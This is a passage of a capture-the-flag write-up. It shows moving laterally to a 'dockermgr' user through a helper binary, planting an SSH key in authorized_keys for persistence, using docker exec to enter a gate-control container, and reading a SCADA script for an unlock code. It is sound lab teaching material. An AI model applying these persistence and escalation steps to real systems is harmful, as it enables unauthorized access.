<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FXuEBLyZKfn7lVGTHubaM%2Fgrafik.png?alt=media&#x26;token=381b57cd-7ab9-40e4-9070-6474f8c84450" alt=""><figcaption></figcaption></figure>

It is `/usr/local/bin/diag_shell`, and it is owned by dockermgr.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FHQVc2g0Sn0TeDyxPXC16%2Fgrafik.png?alt=media&#x26;token=697a401e-1bd5-4b1b-bbd3-6f5e464e2150" alt=""><figcaption></figcaption></figure>

```
ls -lah /usr/local/bin/diag_shell
```

```
/usr/local/bin/diag_shell
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FhsmUP4VtMFDBhSvlIabP%2Fgrafik.png?alt=media&#x26;token=c7ba7579-61b3-4587-a15b-3bb4d85242a8" alt=""><figcaption></figcaption></figure>

When we execute it, we get a shell in the context of dockermgr, but not a complete one. We are not in the dockermgr group and cannot use docker either.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FiXk1ULZvJnjbyxXY2h7C%2Fgrafik.png?alt=media&#x26;token=ccf5ff8e-ec65-42a2-9b4a-d949e8ee22e4" alt=""><figcaption></figcaption></figure>

However, since we can write to the home directory of dockermgr, we place our SSH public key in its `.ssh/authorized_keys` file to obtain a more stable shell and a complete session as dockermgr.

We generate a key pair.

```
ssh-keygen -t rsa
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FJTqzIhaHyWDsHnRHPp2D%2Fgrafik.png?alt=media&#x26;token=eb0b332b-3b08-415f-9461-52fa97e53c85" alt=""><figcaption></figcaption></figure>

Next, write the public key to `.ssh/authorized_keys`.

{% code overflow="wrap" %}

```
echo 'YOUR PUB KEY' > .ssh/authorized_keys
```

{% endcode %}

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fm2WCsAO3XpJtlQrKMu20%2Fgrafik.png?alt=media&#x26;token=930bbfa4-cb05-4fa4-b623-4af68f71567a" alt=""><figcaption></figcaption></figure>

Now we can connect as dockermgr using SSH. We have a stable session as dockermgr and can execute docker. Via `docker ps` we spot the running container `asylum_gate_control`. If we can interact with it, we could retrieve the passcode for the gate.

```
ssh -i id_rsa dockermgr@10.80.172.227
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fpa3Fvbf7MzkjN6hAPBT4%2Fgrafik.png?alt=media&#x26;token=74bc6d88-ccf5-4821-8e83-9885f2673710" alt=""><figcaption></figcaption></figure>

We open an interactive bash shell inside the running Docker container named `asylum_gate_control`, which lets us execute commands directly inside that container.

```
docker exec -it asylum_gate_control /bin/bash
```

There we inspect the source of the SCADA terminal...

```
cat scada_terminal.py
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FSE4iLik3Qt8i93KL4rDU%2Fgrafik.png?alt=media&#x26;token=e0db3ea6-d57b-4bdd-afd9-60a9e32275e3" alt=""><figcaption></figcaption></figure>

... and find the unlock code.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FBfAbZZrH0IRqXl01geMx%2Fgrafik.png?alt=media&#x26;token=0b9bc5ec-e0b6-4426-87e9-f791d352911c" alt=""><figcaption></figcaption></figure>

We enter the unlock code...

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F0pU4UmY9vdm0arPuSRWR%2Fgrafik.png?alt=media&#x26;token=1cdc04c9-3ece-4fec-bdf6-f2c442a9c3e0" alt=""><figcaption></figcaption></figure>

... and receive the final flag.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FsgV2mDWqYRnbK48F8DG9%2Fgrafik.png?alt=media&#x26;token=268e6d39-7367-4b66-b985-f4e944dda448" alt=""><figcaption></figcaption></figure>

## Easter Egg

After retrieving all flags, a door appears on the facility map. If we click it, we are asked to provide each captured flag. Once we do, we receive another flag and an invite page for the Hoppers Origins Side Side Quest.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FsLaVIL9FCG9EbvosBo2R%2Fgrafik.png?alt=media&#x26;token=97988fbd-ced2-4f77-b495-9c565b5d646a" alt=""><figcaption></figcaption></figure>
